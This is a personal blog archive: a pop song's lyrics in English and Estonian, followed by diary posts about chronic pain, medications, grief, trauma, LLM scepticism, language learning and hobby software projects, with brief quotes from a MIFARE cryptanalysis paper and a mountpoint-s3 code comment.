Life is like a movie and I can’t get enough of you
And I can’t (get enough) of you

Maybe I need you
Every time I’m dancing among the stars
There you are
Let me be in love up to my ears, flying in space
You and me together, that’s how it could be
Life is like a movie and I can’t get enough of you

If not for those red roses
And evenings by your side
My hand in yours
On your spaceship
If not for those red roses
And evenings by your side
My hand in yours
On your spaceship
And I can’t (get enough) of you
And I can’t (get enough) of you

Life is like a movie and I can’t get enough of you
Let me be in love up to my ears, flying in space
You and me together, that’s how it could be
Life is like a movie and I can’t get enough of you
Life is like a movie and I can’t (get enough) of you
Life is like a movie and I can’t (get enough) of you
Life is like a movie and I can’t (get enough) of you
I don’t know what to feel without you
You and me together — that’s how it could be

An-Marlen — kosmoselaeval

Ma ei tea, mida sinuta tunda
Sa ja ma koos, nii võikski ju olla
Las olen kõrvuni armun’d, kosmoses lendan
Sa ja ma koos, nii võikski ju olla
Elu nagu filmis ja ma sinust ei saa küllalt
Ja ma sinust ei saa

Elu nagu filmis ja ma sinust ei saa küllalt
Las olen kõrvuni armun’d, kosmoses lendan
Sa ja ma koos, nii võikski ju olla
Elu nagu filmis ja ma sinust ei saa küllalt

Võib-olla vajangi sind
Iga kord kui tantsin tähtede keskel
Sa oled seal
Las olen kõrvuni armun’d, kosmoses lendan
Sa ja ma koos, nii võikski ju olla
Elu nagu filmis ja ma sinust ei saa küllalt

Kui poleks neid punaseid roose
Ja õhtuid su kõrval
Minu käsi su käes
Sinu kosmoselaeval
Kui poleks neid punaseid roose
Ja õhtuid su kõrval
Minu käsi su käes
Sinu kosmoselaeval
Ja ma sinust ei saa
Ja ma sinust ei saa

Elu nagu filmis ja ma sinust ei saa küllalt
Las olen kõrvuni armun’d, kosmoses lendan
Sa ja ma koos, nii võikski ju olla
Elu nagu filmis ja ma sinust ei saa küllalt
Elu nagu filmis ja ma sinust ei saa
Elu nagu filmis ja ma sinust ei saa
Elu nagu filmis ja ma sinust ei saa
Ma ei tea, mida sinuta tunda
Sa ja maa koos, nii võikski ju olla

great wars of our time

2025-07-13T11:00:07Z

X11 vs Wayland
Rust in Linux
LLMs are/can (not) x
Whether trans people are subhuman or not
Whether something may or may not properly be called a “renderer”
Copyleft is stupid, irrelevant and self-defeating/you’re aiding arms dealers if you use BSD/MIT

edit: More as I think of them.

systemd vs OpenRC
your mom vs my mom

kat

2025-07-12T08:25:08Z

Today marks 20 years since Kat de Koning’s suicide.

Missing you.

unedited thoughts about LLMs

2025-07-08T09:49:36Z

Imagining that LLM assistants will help with what is essentially an exercise in theory-building seems deeply mistaken.

Creating stable and maintainable software requires knowing the properties of the environments in intimate clarity (envs e.g.: Elixir, the web, AWS as a whole, HTTP in particular, whatever domains you cross), and having a clear theory of the software under development: as a whole, working project; as an implementation of ideas in a certain language or framework or otherwise; as an artefact being worked on over time (vis-à-vis version control, project management, etc.); and so forth with different lenses.
LLMs can help with none of these, and actively hinder several aspects.
Today’s best approaches only really serve to distance the user from all of these concepts. The work becomes instead “convince the generative model to produce code closest to what I want”, but “closest” is a non-specific property that a generative model will naturally exploit. It will give code a certain way (per its (quite literally) illegally and unethically sourced training data! woo!), and that will then dictate a bit more of the shape of the code you write (or generate) next. There is an entire class of tiny decisions you are repudiating, and difference in craft between the two (and I do mean by craft a proxy for intelligibility, performance, reliability, etc.) is one that will become more and more obvious as time goes.
- rarely bother to “predict” anything, so this is interesting. Usual assumptions apply: don’t particularly feel it or anything will be true, mostly because always extremely prepared to be disappointed even more. e.g. may well not happen, well-written/reliable software might just cease to exist in the large instead ¯\_(ツ)_/¯
If typing speed has even been the bottleneck for your programming you are Doing It Wrong. LLM-centric approaches, even in an agentic scenario (or whatever! the model fundamentally hallucinates! in these approaches, they always will. stop falling for the next thing every 6 months, it’s boring!), decentre all of the theory-building aspect and the hands-on experience necessary if you ever again see yourself having to work on this by hand (vs. declaring it write-only, hoping the agent definitely gives you good things to paste in the console when there’s an incident and you can’t understand the data flow yourself!).
Where do you honestly see this going? Has there ever been any indication that this isn’t another bubble? Do you not already see the horror stories? I haven’t even mentioned the environmental costs; the ones that threaten to displace all other costs with its effects. Or are you going soft on “global warming” too?

know the difference

2025-07-04T08:42:29Z

I think one of my biggest surprises in going to Estonia was discovering that European wasps are just called wasps there.

Dismantling MIFare Classic

2025-07-04T08:42:06Z

Since the tag nonce and uid are sent as plaintext, we also recover the LFSR state before feeding in n_T ⊕ uid (step 4). Note that this LFSR state is the secret key!

Dismantling MIFARE Classic

1179648

2025-06-18T10:24:00Z

// This is a weird looking number! We really want our first request size to be 1MiB,
// which is a common IO size. But Linux's readahead will try to read an extra 128k on on
// top of a 1MiB read, which we'd have to wait for a second request to service. Because
// FUSE doesn't know the difference between regular reads and readahead reads, it will
// send us a READ request for that 128k, so we'll have to block waiting for it even if
// the application doesn't want it. This is all in the noise for sequential IO, but
// waiting for the readahead hurts random IO. So we add 128k to the first request size
// to avoid the latency hit of the second request.
//
// Note the CRT does not respect this value right now, they always return chunks of part size
// but this is the first window size we prefer.
const INITIAL_READ_WINDOW_SIZE: usize = 1024 * 1024 + 128 * 1024;

github.com/awslabs/mountpoint-s3/mountpoint-s3-fs/src/s3/config.rs:243-254

estar

2025-06-17T08:50:00Z

by (what feels to me) some huge coincidence, i find myself increasingly actually believing myself to be more “awake” or aware or something than nearly everyone around me — and not in a way that feels obviously generically megalomaniacal or whatever, but in specific, measurable ways. i’m 100% clear that i’m not delusional in the ways i’m finding myself having a by-the-numbers relatively extraordinary belief.

and that would be just the expected ~phenomenology~ of such a delusion, and this too has never failed to occur to me. it just is what it is, and ngl that’s kinda weird.

this post brought to you from subconscious-overthinking while thoroughly learning k8s in my own time, becoming accustomed to feeling mostly disappointment in work time, and a fair bit of meditation in between

famous estonian hospitality

2025-06-16T01:57:00Z

Estonians are renowned for their social charm, and for good reason are considered second to none in business. Here follows an exemplar of such, when an order from a motorcycle gear and accessory store was unable to be realised in full.

Hello! Thank you for your order. Oxford Aqua T-50 Roll Bag - Grey/White is unfortunately not available. Best regards

I was a little unsure of how to proceed, but figured I could try asking for a different similar item. They all appeared to be in stock on the website.

Hello! Thank you for your email. Do you have this one instead? All the best

They did not refund the difference between the original item and the one I requested, but given the level and speed of service I received in lieu, I didn’t even feel like asking for it!

diary entry

2025-06-15T07:33:00Z

it is so simultaneously disembodying and hyperembodying to be in pain

editor!

2025-06-02T04:56:00Z

wip: WYSIWYG editor (just added the little language editor bit to code blocks) which is entirely CommonMark-driven! Behold:

iex(7)> Kv.Content.get_item!(139).body_md |> IO.puts
[debug] QUERY OK source="items" db=0.9ms idle=335.6ms
SELECT i0."id", i0."kind", i0."path", i0."title", i0."metadata", i0."published_at",
i0."published_at_slug", i0."tags", i0."body_md", i0."inserted_at", i0."updated_at",
i0."author_id" FROM "items" AS i0 WHERE (i0."id" = $1) [139]
↳ :elixir.eval_external_handler/3, at: src/elixir.erl:386

* echawwo mi kin, **hereeee**
  * yesssss
  *

```rust
func main() -> Result<(), Box<dyn Error>> {
  // nyonk!
}
```

yeehaw

```plaintext
o//
```
:ok

2025-05-30T05:38:00Z

Follow-up to cosas pequeñas:

The little blog engine slowly grows more capable. It’s been nice.
Decided to turn that homelab server into a gaming PC instead, haha psyche! Instead decided to learn better how to cross-build things and operate k3s without trying to shove everything through a NixOS module.
Ketamine infusion probably happening around August.
Clonidine effectiveness wore off, increased dose, wore off, increased dose, wore off. Just saw my psychiatrist again and he, like every other specialist, is “drawing a blank”. Going to keep increasing the dose of that/try not to fall over/try not to run out and get hit with rebound hypertension, consult again in 4 weeks. Not feeling super good about this but wcyd
Autumn has been lovely, hello winter!

“it’s a pretty view”

2025-05-28T02:29:00Z

Rest in peace, Charlotte.

ella

2025-05-26T04:30:00Z

“i love you too darling”

2025-05-25T05:47:00Z

more than two (!) years ago

2025-05-25T04:20:00Z

Entire body aching. Shoulders, elbows (both strong), wrists, fingers joints, back of hand (right esp), knees, upper and lower legs top, back; feet all over. I will run this body into the ground if I have to, not out of malice, but out of love for my own existence, our own, its own existence and refusing to let this sap my quality of life. It is clearly not responsive to either rest and taking it easy, or staying moving and stretching and being active. It is caused by neither, helped by neither. I will rest as much as I like, but then I will work and push as hard as I want. Stimulants and cannabis help me do both, and it will rely on them to help with both. To do otherwise is to waste the gift of opportunity it has.

It is on a mission.

closure

2025-05-24T15:13:00Z

Noodling away at what has motivated the things I’ve chosen to do lately.

This seems like a fruitful endeavour directly because I’ve been so limited in my ability lately; what have I prioritised? What, empirically, drives me when nothing else can? I struggle so much with self-knowledge — which is, at its heart, a weird “rendering” of the equally true/first-person point-of-view statement “I struggle with a lack/surplus of identity”¹ — that revealed preference is a very powerful source of uncluttered information.

I’ve been angling to write more, doing things to make that feel nearer to hand, to lessen impedance; to exist publicly more, to be somewhere more. And it’s obvious, internally, that this is driven by a kind of mortality fear—pain is a signal, and I cannot help but react to it. But it’s obvious, too, that this is manifesting some kind of equal and corresponding oppression in the psychic dimension. Change is life is change.

Collecting old posts into one place feels, allegorically, like collecting every part of me that has existed and, at least, letting the pieces stand together at the end. I’m romanticising it a lot, really, but at the same time there is a me that experiences it with intensity. To collect oneself. It’s a bit of a quiet, sisterly companionship feeling. It’s a nice surprise, when you’re feeling this tired, to realise just how much you’ve done, how much you’ve experienced. Decades of being amongst yourself. You can feel held in that. It also gives a sense of being (able to be) seen to parts that might lack it.

There’s also a very peculiar sense of legacy. I have two kids; both in high school, now, getting to the age I was when I started to learn who I was. My marriage with their mother didn’t survive my transition. She and I both tried extremely hard — both very young, stupid parents — but ultimately I decided a line had been crossed when she threatened my life. The divorce and transition that both ensued were so incredibly rough. I had my first major breakdown within two months of my moving out of the family home, at times having 5 days of work and then a weekend of 2 days of solo parenting a 2yo and 6mo alone, having just turned 22, having started HRT 6 months earlier, with your marriage and feeling of security in being alive crashing down 6 months before that.

Like it was just a lot!! I was so unprepared. I was so unprepared for the depression, anxiety and trauma that was to come. My eldest brother called me to abuse me for my decision on multiple occasions, refusing to let me talk (!) or even have a moment to respond between salvos. My mum did her very best to be supportive, always, which I am always grateful for. My other older brother — the one I was closest to, growing up — became uncomfortable around me (which never changed again!).

That was 2013, and I just never really recovered. I would see my kids every few weeks, and as my general state of mental health would continue to suffer hits over the years to come — with the really big hits to follow in 2016 (capital-s Sick for >1y), 2017 (girlfriend suicide attempts), 2017 again (rape), 2018 (Sick rebound), 2022 (covid), 2023 again (auto-immune? + mould), 2023 (assault), 2024 (chronic pain starts) (HMM that was a longer list than I was expecting. and I am sure it is incomplete.) — I never became capable of more than that. And so as we have continued to know each other and see each other and love one another, I haven’t been a part of their life in a “normal parent” kind of way for more than 10 years at this stage. At least somewhere, once, I need to make sure it is written and known that I never wanted this.

So, making sure there is as much of what of me already exists out there, in a meaningful/significant way, in a place that’s linked together. It sounds a bit morbid, but I have spent my entire life as a programmer, having decided at an early age not to, as the child who was taught by her father, who looked up to him so much, who then had to deal with his suicide when she was 13, to deal with his never getting to know her and who she became. In so many ways, I turned out like him, both good and bad—and I mean that in a good way. I’ve struggled so much having so little chance to know him more, and I’d like to avoid committing the same mistakes, if possible. May this hang around and be found some day, and may I get to keep loving them for a long while yet.

I’ve spent a lot of time programming, almost feverishly at times. It feels like the one thing. I don’t know how to put that otherwise and still convey my meaning. It is my connection to the source right now².

Meditation and Duolingo are kind of the same; minimum time spent every day towards an end. It’s very funny to me to put them together like that, but what they have in common is that they’re daily practices in a very pure kind of way. There: my revealed religion is the getitdone nature of Duo-ism. To be enlightened is just to be friends with all of existence. Etc. etc.

Work is another practice, with the added bonus of providing another kind of security which I am very childhood-intuned to care about. Two days a week, and I get to treat it as another meditation. I’m extremely privileged not to have this as a stressor.

Time that I’m not doing those things is the “everything else” of life, maybe so because those things don’t involve Annie, and anything else can; despite being very separate in the ways that define us, we live life as a pair. Despite (what I can only describe as) the massive ball of ennui that wants to numb me to everything, it’s really easy to feel motivated to keep our home feeling cosy, tidy, clean, etc. It’s nice to go get coffee together, or to get No Chicken & Lettuce sandwiches and Monster³ from 7/11 and say hi to Ajay. (Hi Ajay.) And League of Legends is so nice for our competitive side (though I have to admit, it has outsized effects on my general feeling about life when people are really nasty to each other on it).

I am doing the things that give me life. Nothing else really makes sense or matters right now.

In a BPD- and/or DID-ish type of way. ↩
¯\_(ツ)_/¯ I tried. ↩
OR NOT LATELY. Because, for some people, carbonated drinks are too fart-inducing. ↩

Dear Apple

2025-05-24T07:54:00Z

Could you please restore support for ROSETTA_AOT_ERRORS_ARE_FATAL?

Yours,

An “AOT header specified too many segments” sufferer

sairyx

2025-05-24T03:18:00Z

Imported 48 blog posts from 2010–2012 by trawling archive.org. How did 2010 Wordpress have better syntax highlighting than any blog I’ve seen today? Must remedy.

I saw so many different designs I’ve used over the years, but this one has to be my favourite:

Current self-narrative for dealing with pain.

2025-05-23T12:07:00Z

I go through about three of these a week. Right now I’m telling myself that I’ve done everything I possibly can to get it recognised/understood/diagnosed, and that so far all anyone can say is “idk, fibro maybe?” means there is nothing more to be gained by worrying about it or trying to understand it, no more to be gained by reacting to today’s new form of it, or tomorrow’s, and that the only meaning I really can make of this is that I am to be someone who deals with this, to demonstrate what it means to live in acceptance and all that.

(daily meditation this year has been pretty life-saving, incidentally.)

And then if something does go wrong, well, that sucks, but doesn’t make this choice any less correct with the information I have now.

Machinist and Machine

2025-05-23T07:34:00Z

punkx.org:

I love coding so much. I don’t mean software, I mean just writing code and talking to the machine. […] Now most code I write is just tokens. Tens of thousands of tokens per day, empty. I skim through them to decide if they will work or not, accept or reject them. Again, and again… I have no empathy or emotion towards them, I feel nothing, I have become the computer that evaluates them. From machinist to machine. I can feel it. I can feel how it is taking me away from the path of understanding. Every day, little by little. You must have noticed it too.

Indeed, I have.

Of all bugs to have, I’m currently nursing a timezone-related error in my blog engine, and so everything’s appearing 10 hours ahead of time. Or maybe I just really am ahead of my time?

edit: add “(UTC)” to the field so i remember. fixed.

the rubenerd blog quiz 2025

2025-05-22T19:29:00Z

I haven’t done one of these kinds of things since I had a LiveJournal. Here goes.

Have you ever proposed a blog quiz, or sneezed while riding a unicycle?

Not to my knowledge.

Sweet or savory?

Generally sweet.

What are three legacy consumer tech devices you’d love to see brought back into the mainstream?

Ehhhh, I don’t know. I am not much one for nostalgia, or forming memories that last more than a few years. I’m racking my brain but I just don’t. If LLM nonsense continues to infiltrate then I’ll have plenty to say?

Do you have a lucky number, colour, or day of the week?

11, all of them, none of them.

Free space

Filesystem     512-blocks       Used  Available Capacity  iused       ifree %iused  Mounted on
…
/dev/disk3s5   7805330720 3818537728 3229630184    55%  6905631 16148150920    0%   /System/Volumes/Data

What’s something you genuinely tried giving a go, but never grokked?

About 15 years ago I made my entire personality “if I try something and I don’t like it, I will try harder” when my job entailed interop with SharePoint. So far so good, I think.

Do you have a favourite virtualisation tech?

I’m playing a lot with VZ right now (literally right now) and it’s pretty nice. More broadly, though, I have to hand it to QEMU. It is so complete. It is so complete. User-space emulation is particularly magic. It’s also the only one I have commits in (afaik).

What’s the weirdest thing you’ve ever planted?

Seeds of doubt.

What’s your favourite instrumental song? Or if you don’t have one, what’s your least favourite instrumental song? If you don’t have one, what’s your favourite instrumental song?

I couldn’t possibly name one. Also, what counts as instrumental? Here are two I’m especially fond of.

Have you lied in any of these questions?

The lioness does not concern herself with justifications.

Dreamt of an old friend.

2025-05-22T15:05:00Z

Not been in touch in many years — lost in the friendship group rift after a breakup — but we were once close, and would stretch time and plans to see each other when we’d be on the same continent.

In the imaginal, we were both at some kind of chill gathering, a quiet house party, and it was wrapping up. It’d be the last time I’d see them before they were due to fly out, and we had a corner of the room to ourselves.

I remember gently resting my head against their chest, and then — looking into each other’s eyes — very tenderly and gently sharing affirmations of our mutual love.

Missed you.

raid boss

2025-05-19T10:12:00Z

no highly esteemed deed is commemorated here… nothing valued is here. What is here was dangerous and repulsive to us.

mi pila

2025-05-13T11:07:00Z

A few weeks (months?) ago I thought it’d be neat to have a little pop-up window visualising the output of jj, so I could look at the changelog graph change in real-time as I did commands, rather than checking Tl (jj log) repeatedly.

En route, I really wanted to know what song was playing on my Inkplate, so I hastily threw together suena and a script for calling it over the network.

As I started learning how to use jj-lib, I decided it was finally time I would not just push it to GitHub, but make my own. nóssa is very much a work-in-progress, but it’s functional (and backed up) enough that I can just keep everything there now. Along the way I learned to produce commit graphs the same way jj does, and get used to git2-rs, which has been neat.

While pushing LiveViews a little too hard, I found I needed another Elixir/Phoenix project to work on, since nóssa’s a first-of-the-kind for me and I needed to learn faster and spread the mistakes out a little. Redoing my blog seemed like a good opportunity. I’ve been putting off posting more until I finally got asset management done, but then I was finding the compile/Nix-realisation-time on my VPS prohibitive, so now I have a really big homelab server (mothdust!) for the first time in forever.

Now I’m thinking I’ll want a caching reverse proxy that sits on a very small VPS, so that if mothdust goes down, GET requests can still work. And maybe I can make it do the upstream requests over the Erlang network instead of just being a dumb client. Among other things, this avoids having to bypass Anubis or similar things another way, and could also e.g. fetch a list of known pages to “pre-render” the site into cache, purge the cache automatically on code updates and content edits, etc.? I’m particularly trying to have fun with my website, because why not? It’s a part of me.

sueños

2025-05-05T13:48:00Z

my dreams press in on me

acumulando

un till i more often reminisce of them than of this

they bubble to the top, and over

cosas pequeñas

2025-05-05T05:11:00Z

Got sick of having to do a half dozen VCS and Nix operations just to publish a new blog post; after a lifetime of managing to avoid it, gave in to the ultimate yak shave and wrote a little blog engine. (You’re reading from it now!)
Got sick of waiting as long as I do for compiles on my VPS and ordered the bits for a little homelab server, which will probably replace the VPS entirely (though maybe I’ll keep a very small node for a static IP¹ and not putting my home IP out there). Soon this blog will be hosted from home \o/
Ketamine consult was straightforward. I can’t say it sounds promising, but I’m going through the motions to get a quote from a hospital.
CLONIDINE. Taking that at night now, and fuckity fuck the night sweats are almost a non-issue, just at 50µg?! Holy grail. Life feels significantly less shit.
Autumn is so welcome.

just now

Annie: “Kas sa tead [unintelligible]?”
Talya: “Kas ma tean.. mida?”
Annie: “Prawn?”
Talya: “Kas ma tean… prawn?”
Annie: nods
Talya: “Tean küll. Oled sina.”

we’re in CGNAT territory out here :/ ↩

omg

2025-04-27T00:00:00Z

La sangre es más espesa que el agua.

2025-04-05T00:00:00Z

Rheumatologist was distracted and not really listening. He had nothing new to offer at first, but after it was clear I wasn’t game for “what if we try more anti-inflammatories” round III, he suggested a ketamine infusion to try to reset my nerves. I don’t like the idea of a hospital stay but, y’know what? Fuck it, we ball. Consult with the anaesthetologist in four weeks. If nothing else I get to eat hot chip.

Qué sorpresa, the tricyclic’s side-effects ended up prohibitive even on minimum dose; seven weeks was the mark for “increase again and start reducing duloxetine, or abort”, and I have chosen abort. No end in sight for night sweating. Getting a hold of my psychiatrist again to see what his bag of tricks might hold.

Time skips along. I am unsure how I feel about the impressions I leave on this world; unsure about most things. The rise of LLMs at this particular juncture has been really depressing; I am starting to lose my patience to deal with their insertion in my life in any context. The next time someone at work suggests running something through ChatGPT I might just take the rest of the day/week/month off. A good chunk of my industry has fallen for the bait. I was already having trouble taking other people seriously, in general, as a concept. Now I have to deal with them coming off as less interesting than the automata they coo over. Please, tell me about your productivity gains. Tell me about the vibes. Tell me. I am listening.

There are a few things I am able to feel sure about, one of which is this: trans rights are human rights. I don’t run any analytics and don’t often think about my reach, but I have some, don’t I?

May we find the liberation, friendship, and family we deserve. May we become ourselves, unfettered by shame. May our arrows find their mark.

Those who oppose our right to peace, self-determination, and a life worth living, entirely on our own terms – may you eat shit and die.

Algún tipo de mitten

2025-03-14T00:00:00Z

I was sitting in the dark the other night, meditating; at this point in time, there was a particular point on the inner side of my right ankle that was particularly hurting, and my focus there; a little duller was an ache on the top of my left foot. In being with it, I realised, oh, this is chronic pain.

And it’s not a very surprising thought now, truly, but when you go to bed one night and your leg hurts so much you’re worried there might be a blood clot, it’s not yet obvious to you that this will be the start of something that will last at least nine months more. But I think nine months without a cause identified is probably a fine enough time to say we’ve crossed the line into “chronic pain”.

In the presence of daily pain that seems to change form and “spread” through the body, it’s very hard to shake the feeling there isn’t something progressive happening. My left eye is seemingly permanently some degree of bloodshot these days. The bruising on my lower legs is ridiculous, and the way they refuse to heal. I’d kind of prefer it if the pain coincided with them, but it mostly does not.

TCAs were indeed my GP’s preference, so I’ve started out a very slow transition to amitriptyline. The relief with sleep has been immediate, an absolute god-send. Was extremely sleepy in general the first week or so and napping every day, but that’s a really nice experience after such a long time of sleeplessness. That’s calmed down since, and while I’m still sweat-waking I’m pretty much right back to sleep and actually feeling rested in mornings. I am noticeably more dissociated on it; maybe it’s just the SNRI/TCA mix, maybe it’s maybelline. Will adjust the dosage in three weeks.

Rheumatologist follow-up finally in just under two weeks (last was 5 months ago); I don’t expect anything useful to come from it. Called it quits with my psych. Poco a poco.

Cadê nossas mittens?

2025-02-20T00:00:00Z

I keep trying really hard to improve my situation, but reality proves a harsh mistress. The other day my wife said “it feels like our circle is getting smaller”, and that’s something of a vibe.

Health issues steadily worsen. Last month I was meant to try triggering the arrhythmia with a Holter monitor, but my sleep started failing so much that I couldn’t have put in the exertion required even if I wanted to. Around the same time, my usual nightly cannabis started reliably provoking palpitations, so I stopped it.

Since then my ability to sleep has completely left the building. Coming off nifedipine helped a little bit with inititation — without cannabis, falling asleep was impossible because of how much it fucked with my blood pressure/head — but maintenance is still impossible. Duloxetine wakes me up every hour or two in sweat without fail. Pain levels have steadily grown.

I started lactating last month (!), which was cool, though I’ve also had a night each month of really bad cramping since then too. Completely immobile from 8pm to 4am last night, but without even the slightest chance of falling asleep or dozing through parts of it; best I could do was rotate on the bed to try to shift the sensation. Now it’s 10pm and I’ve woken from a five hour ‘nap’ and ugh.

Dissociative symptoms have grown much worse since stopping regular cannabis use, which was unexpected. I have a little note I add to when I notice psychosis warning signs, which has been slowly growing, because I don’t know how else one tracks this.

“feel like i’m a passenger in this body”
feelings of thought insertion from kin
“this life simulation is starting to get real weird lately” (re: stuff on kitchen counter/unreality of it)
“I just can’t get a grasp on anything”
‘negative’ sx days esp. sleepless; anhedonia

With continuous sleep deprivation being a trigger, it’s starting to get to a point where I either fix that or fix this.

It’s really unclear how I fix sleep. Coming off duloxetine without a replacement is not an option, but another SNRI isn’t likely to be better (I remember night sweats on desvenlafaxine), a plain SSRI isn’t likely to be good enough (last time I was on escitalopram it wasn’t better than nothing), and while I don’t have experience with other classes to know, it seems likely TCAs will share this property. That said, they’d be new to me and therefore worth a shot.

I could also try to force the issue by forcing sleep itself; temazepam is pretty much a definite no given its long-term viability, trazodone is a maybe, and z-drugs are what I’d like to angle for since they seem to fit the bill best.

“angle for” because getting a psychiatrist within six months of asking for one is pretty much impossible, as measured by kin who still hasn’t managed to succeed in even getting a referral accepted — there isn’t any expert help available, so, as usual, the best I can do is make my case to my GP, who is helpful, resourceful, and has always done what she can.

Fixing psychosis-adjacent issues is the other option. I’d probably be willing to try quetiapine again, despite my last experience. Brexpiprazole might be OK again too (also lol (also “our percentage of participants who identified as non-female (i.e. as male or neither male nor female) was slightly larger (37%) than those in other studies (approximately 25%)”, both figures incredible, BPD enbies represent!)). I list only these two I’ve had experience with as, again, it’s on me to make the case for prescribing. Streamlined authority 4246 schizophrenia, woo.

Seeing the doctor tomorrow (after a bit more than a 3 week wait, but hey at least it’s not months), so we’ll see.

In other news, my last psychologist appointment went awfully — after eight years with him, it’s probably time to call it quits. Surprised the hell out of me by spending our entire hour on his fears and prejudices. I just kind of dissociatively fawned through the whole thing and spent the next few hours in shock until I slowly realised what had happened.

To be clear, eight years before hitting a wall you really need help scaling is a very good run, but this particular wall I’ve come up against repeatedly in the last ~year and a half, this time most assuredly and directly, so.

Still really enjoying Spanish and Portuguese. Daily meditation has been a bit of an oasis. Home-cooked meals have suffered greatly as my sleep has. Char decided to call it quits on Ava; once the editor (and its helper editor tool) was ‘done’, she started back on some language features, but the more we did, the more we realised we don’t particularly actually want to write this language as a “fun thing to do”, and so the impetus for implementing all its gory details went out the window. We’ve been doing a bunch of CAD lately, though, since we got a 3D printer, and that has been fun :) Likewise riding again with our kin.

Finding the good where we can. Boa noite 🧡

Reincorporation

2025-01-26T00:00:00Z

I’m reincorporating posts made by a variety of no-longer-public-facing selves, long into the past. They’re reposted on this blog under their original dates, with an index in this post. Sorry in advance if these flood your RSS reader!

May they help someone along their way.

alex

Daily writing exercise for my then-Dom, shared privately with her.

2018-05-07: bullet journal
2018-05-08: laptop
2018-05-09: hypomania
2018-05-10: bed
2018-05-12: green tea
2018-05-13: 105/710
2018-05-14: prelude
2018-05-15: tired
2018-05-16: train
2018-05-17: panic disorder
2018-05-18: identity
2018-05-19: morgan

xue

Exploring my identity, shared with select friends.

2019-12-09: knowing is too late
2020-03-31: key
2020-04-24: born in song
2020-09-14: thorn
2020-10-07: motherhood
2020-11-05: a different lens
2021-03-15: collared
2021-04-02: one step forward
2021-04-27: submission

flashes

Anonymous gemlog, stumbled upon by other users of gemlog.blue.

2021-03-25: hostility
2021-03-29: longing
2021-03-31: blocked
2021-03-31: occlusion
2021-03-31: pull
2021-04-04: impinged
2021-04-06: inscrutability
2021-04-19: cycles
2021-04-21: recapitulating
2021-04-23: mouii
2021-04-27: occlusion II
2021-04-27: vacillation
2021-04-30: summarised
2021-05-04: kept
2021-05-05: kutuzyoku
2021-05-06: siriai
2021-05-07: p
2021-05-07: zashchitnitsa
2021-05-08: excerpt
2021-05-09: title I
2021-05-10: sequencer
2021-05-11: kekkyoku
2021-05-11: tumari
2021-05-12: inscrutability II
2021-05-18: отчужденность
2021-05-19: iraira
2021-05-24: various
2021-05-26: このままじゃ
2021-05-27: грёза
2021-05-31: lustre
2021-06-04: mikatralia
2021-06-05: aside
2021-06-05: ついた
2021-06-08: (un)monitored
2021-06-08: ついたって
2021-06-09: dasein I
2021-06-09: dasein II
2021-06-10: dasein III
2021-06-11: объект
2021-06-13: нужно
2021-06-15: cartita
2021-06-15: dasein IV
2021-06-16: 命令
2021-06-17: становление
2021-06-18: dasein V
2021-06-19: flashes: end

kwasticat

Short-lived BDSM journal that mostly mirrored posts from “flashes” after the fact. Resurrected from Wayback Machine; no idea how much I’ve lost.

2021-06-22: christening
2021-06-23: vision

Nix humour

2025-01-04T00:00:00Z

Something about this really fucks.

Fear

2025-01-03T00:00:00Z

content note: physical illness, death, suicide.

one thing about spending enough time fearing death, for whatever reason and reasons that may be, is that one end to it is not removing the originator of that fear — which depending on your psyche or conditions may not always be possible — but learning to not fear death instead.

i basically think anyone who spends enough time in panic over enough years is liable to end up this way. the alternatives are burning to a husk, loss of reality checking, or suicide.

personally still a bit afraid — not so indifferent that i’d go hard for no reason when exercising yesterday, for instance, i give my body what it asks for (fluid movements, light effort, nothing anaerobic), but not so afraid that i won’t do my best to purposefully trigger the new arrhythmia when doing the holter monitor next week, despite risk inherent in inducing one.

i find i keep having to say to myself, if this is all it would take to kill me, then now or in two weeks accidentally say, it really makes no odds. that i have to deploy this regularly to move forward with my days evinces a certain something. and while the uncertainty itself is one degree of unbearable, a kind of assertion that i cannot trust in my self-knowledge, the collective absence of faith from others is another.

if the condition finally gets worse after decades, if everyone’s been telling you it’s false/“Just Anxiety”/psychosomatic/“functional” (given decades of panic disorder etc.), and now it’s enough to be visible, it’s a relief and starts to feel your only ally — the only true thing in all this time. i don’t know if it’s true that the same death i feared and felt daily in my mid-teens until my early 20s is this one, the one now manifesting so physically, or the one that stole a few years away from me from 2016, but on reflection i’ve spent most of the last 22 years actively fearing and feeling death.

an end to this uncertainty and the loneliness within it is not exactly an unwelcome thing in and of itself. we were never promised even one day of the beauty of life, y’know? and i have experienced so much of it, awe-inspiring and terrible and banal. nothing was ever ever promised.

2025

2025-01-02T00:00:00Z

Happy new year!

I guess I’m taking a slightly more laid-back approach to goals this year. Health issues have unfortunately progressed; whatever pain relief I was getting from the duloxetine (or otherwise), either that effect has worn off or the pain levels have risen to break through.

I’ve also encountered a new arrhythmia, so “sudden cardiac death” is back on the menu of dread. Holter monitor next week where I’ll try to reproduce that without dying. Rheumatologist follow-up appointment where I expect to be diagnosed with hEDS in … 12 weeks. So it goes.

Goals, then.

Keep up Duolingo.

866 days now; the streak isn’t the important thing, but it has been a really good lesson in proving to myself I can stay consistent with things given the right motivation. (In this case, being able to speak my partner’s native language.)

Duolingo isn’t for everyone, and the course quality varies wildly, but the Spanish course for English speakers is incredible, and if you spend 15-20 minutes a day on it, and let it be your fallback activity when bored, you will steadily but surely gain an extremely real facility with the language.

(This much time is also enough to reliably sit around Obsidian/Diamond league, and sometimes it can be a nice dopamine hit to make an effort to finish at #1.)

I have the benefit of being around a native speaker all the time, but the first year or so my level wasn’t anywhere near being able to use it casually without it getting annoying for both of us. By now, we can switch in and out pretty comfortably around the topics I’ve covered lexicon for.

I’ve also added Portuguese on the side, spending roughly half my time each day on each, and it works pretty well! I wouldn’t start two at once (especially closely related languages like these; too confusing), but being a few years in with one makes it an easy way to bootstrap another habit. Português é estranho, mas eu gosto :) It’s a much shorter and less developed course than the Spanish one, so I expect I’ll finish it this year and start another in its stead.

Daily meditation.

Planning to slot this in with my Duolingo practice. I’ve been an on-and-off meditator for 20 years or so now. I need the equanimity now more than ever.

Home-cooked meals.

This has been a real struggle over the last year or two, with energy levels so low (and no microwave in the Tallinn apartment!), but since moving into my new place back in Melbourne it’s been a key focus. Just need to keep it up.

Deliver the Ava MVP.

Charlotte’s been working non-stop on Ava BASIC (previously) since July, and hopefully we can get that into a complete MVP this year.

Secondary project.

Having an “off” project would be nice. This is a vaguer goal, but I get the feeling technical writing would be a good fit for us.

Keep learning.

So far I have an unsorted list of things I’d like to learn or improve at:

Formal methods in digital design. We’ve played around with this a bit (e.g. with Robert Baruch’s Amaranth exercises; solving Sudoku with HDL and formal was a cool and unexpected twist), but not enough to usefully use it in actual designs.
Likewise, something like Lean and perhaps Quint.
Stenography with Open Steno.
